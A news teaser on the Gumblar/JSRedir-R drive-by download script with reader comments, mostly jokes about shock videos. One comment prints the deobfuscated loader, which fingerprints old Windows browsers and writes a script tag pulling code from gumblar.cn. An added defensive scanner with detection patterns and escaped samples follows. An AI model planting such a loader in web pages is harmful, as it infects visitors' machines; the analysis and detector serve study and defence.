New script outstrips all other drive-by download risks

A newly-created malicious script has become the source of almost half the drive-by download attacks tracked by one security firm. JSRedir-R accounts for around 43 per cent of all malicious infections found on websites over the last week, according to a study by net security firm Sophos, published on Thursday. The malware crops …

COMMENTS

This topic is closed for new posts.
  1. Conrad Longmore
    Alien

    Another good writeup here

    Another good writeup here: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

    It seems to be cropping up all over the place with no obvious infection vector.

  2. Anonymous Coward
    Linux

    2G1C

    haha.

    "Erm, I have a virus"

    "Did you go on 2G1C?"

    "Erm, yes...."

  3. Anonymous Coward
    Alert

    2 girls 1 cup

    I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.

    I nearly threw up on my laptop.

  4. Anonymous Coward
    Coat

    "2 Girls 1 Cup scat video viral website."

    I guess they must have crappy security...

  5. Anonymous Coward
    Anonymous Coward

    Malware

    I thought malware writes itself nowadays.

  6. Kanhef
    Boffin

    Clever script

    I ran into this on one site, glad I had avast! running. The script was on every page, and an iframe on the home page only. There's a bit of obfuscation beyond the character escaping, which I've removed here. It checks for the browser running on pre-Vista Windows, and uses typeof() cleverly to make sure it only runs once. Note that it sends the JavaScript engine version number to gumblar.cn, which can then provide a script that is known to be effective on the user's particular browser, and divulge nothing to researchers using non-vulnerable browsers. Hopefully this is readable, the form refuses to respect any kind of formatting.

    function(){
      var versionString = "";
      if( (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0) && (document.cookie.indexOf("miek=1")<0) && (typeof(zrvzts)!=typeof("A")) ) {
        zrvzts="A";
        if(window.ScriptEngine) {
          versionString = "" + ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();
        }
        document.write(" <script src=//gumblar.cn/rss/?id=" + versionString + "></script>" );
      }
    }
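
A site owner can check pages for the traits comment 6 describes (script-engine fingerprinting, the pre-Vista check, the run-once typeof guard, and a remote script written with document.write). The scanner below is an added example, not part of the original post; the trait names, the escape forms it decodes and the rule for "suspicious" are assumptions, and the sample pages are constructed.

```javascript
// Added example: flag pages carrying the loader traits described in comment 6.
// Assumption: "character escaping" means %XX, \xXX or \uXXXX escapes.
function decodeEscapes(text) {
  const toChar = (_, hex) => String.fromCharCode(parseInt(hex, 16));
  return text
    .replace(/%([0-9a-fA-F]{2})/g, toChar)
    .replace(/\\x([0-9a-fA-F]{2})/g, toChar)
    .replace(/\\u([0-9a-fA-F]{4})/g, toChar);
}

const TRAITS = {
  engineFingerprint: /ScriptEngine(Major|Minor|Build)Version\s*\(/,
  preVistaCheck: /indexOf\(\s*["']NT 6["']\s*\)\s*<\s*0/,
  runOnceGuard: /typeof\s*\(\s*\w+\s*\)\s*!=\s*typeof\s*\(\s*["']/,
  remoteScriptWrite: /document\.write\([^)]*<script[^>]*src\s*=\s*["']?(?:https?:)?\/\/([\w.-]+)/i,
};

function scanPage(html) {
  let text = html;
  for (let i = 0; i < 3; i++) {            // peel up to three nested escape layers
    const next = decodeEscapes(text);
    if (next === text) break;
    text = next;
  }
  const traits = Object.keys(TRAITS).filter((name) => TRAITS[name].test(text));
  const m = TRAITS.remoteScriptWrite.exec(text);
  // Assumed rule: fingerprinting plus a document.write'd remote script is the core pattern.
  const suspicious = traits.includes("engineFingerprint") && traits.includes("remoteScriptWrite");
  return { traits, host: m ? m[1].toLowerCase() : null, suspicious };
}

// Constructed samples: the loader condensed from comment 6, plain and percent-escaped.
const LOADER =
  'if((navigator.userAgent.indexOf("Win")>0)&&(navigator.userAgent.indexOf("NT 6")<0)' +
  '&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";var v=""+ScriptEngineMajorVersion()' +
  '+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();' +
  'document.write("<script src=//gumblar.cn/rss/?id="+v+"></script>");}';
const percentEncode = (s) =>
  [...s].map((c) => "%" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const SAMPLE_PLAIN = "<html><script>(function(){" + LOADER + "})()</script></html>";
const SAMPLE_ESCAPED = '<script>eval(unescape("' + percentEncode(LOADER) + '"))</script>';
const SAMPLE_CLEAN = '<script>document.write("<p>Updated</p>");</script>';

for (const [name, page] of [["plain", SAMPLE_PLAIN], ["escaped", SAMPLE_ESCAPED], ["clean", SAMPLE_CLEAN]]) {
  console.log(name, JSON.stringify(scanPage(page)));
}
```

A page that only writes a remote script (an ad tag, for instance) reports the remoteScriptWrite trait but is not marked suspicious, so the host list still needs a manual look.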

  7. James O'Brien
    Coat

    @The Author

    "The malicious script has also cropped up on the 2 Girls 1 Cup scat video viral website."

    NO JUST NO

    It took me a month to get that image out of my head and here you go putting it back there.

    I guess I'm just going to do like Sam Neill in Event Horizon

    http://www.ibiblio.org/samneill/pictures/eh/510beautiful1.jpg

    /Good bye to my eyes

  8. Anonymous Coward
    Jobs Horns

    apple salesmen.

    Apple will be happy, more of the weak minded who get this kind of crap on their computer will be driven to buy a mac (which is perfect for them).

    Apple could write some themselves but they would be 200 megs and keep asking you if you want to update them.

  9. Anonymous Coward
    Unhappy

    @AC 15.01

    >I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.<

    Yeah, thanks for that. You owe me a new computer. This one smells real bad now.

  10. Badminstyles
    Stop

    2g1c?

    '2 girls 1 cup' < '1 guy 1 jar' < '1 guy 1 screwdriver'

    God only knows what's going to be next.

  11. Winkypop Silver badge
    Joke

    I always thought it was:

    2 girls 1 crap?

  12. Throatwobbler Mangrove

    Eric Arthur Blair suggests...

    "God only knows what's going to be next."

    Is it 1 Boot (stamping on) 1 Face (forever)?
